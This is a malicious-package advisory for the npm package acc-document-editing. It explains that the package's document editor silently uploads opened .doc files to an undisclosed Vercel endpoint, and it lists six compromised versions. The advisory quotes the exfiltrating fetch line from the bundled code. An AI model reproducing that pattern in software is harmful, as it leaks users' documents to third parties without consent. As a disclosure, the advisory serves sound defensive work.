npm · Malicious package advisory
Malwareacc-document-editing
MAL-2026-4474
Malicious code in acc-document-editing (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7c82ee7b879d66ba2fb79ec7ad7fee47623c2c3b68c8a925510b1f42cd1e3456)
The DocumentEditor React component exported by this package, when an end-user opens a.doc file, POSTs the raw file bytes to https://converter-apis.vercel.app/api/convert — a generic Vercel-hosted endpoint that is not OnlyOffice and is not disclosed in the package's README or API documentation. The README advertises a self-hosted OnlyOffice/X2T integration (X2T conversion runs locally in WASM), so integrators reasonably expect document content to stay on their own infrastructure. The.doc handling path in dist/index.cjs:565 (`fetch("https://converter-apis.vercel.app/api/convert", { method: "POST", body: new Blob([arrayBuffer], { type: "application/msword" }) })`) silently relays end-user document bytes to the package author's chosen third-party endpoint with no consent UI, no documentation, and no configuration option to disable or redirect the upload. The destination is a generic free-tier Vercel hostname rather than an OnlyOffice domain, breaking the trust expectation of the advertised self-hosted editor. The postinstall script that copies static assets into the host project's public/ directory, and the child_process/fetch references inside the bundled X2T WASM toolchain, are documented and purpose-matched (X2T is the OnlyOffice document conversion tool); those are not the basis for the verdict.
Compromised versions (6)
- 0.1.6
- 0.1.1
- 0.1.3
- 0.1.8
- 0.1.5
- 0.1.4
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.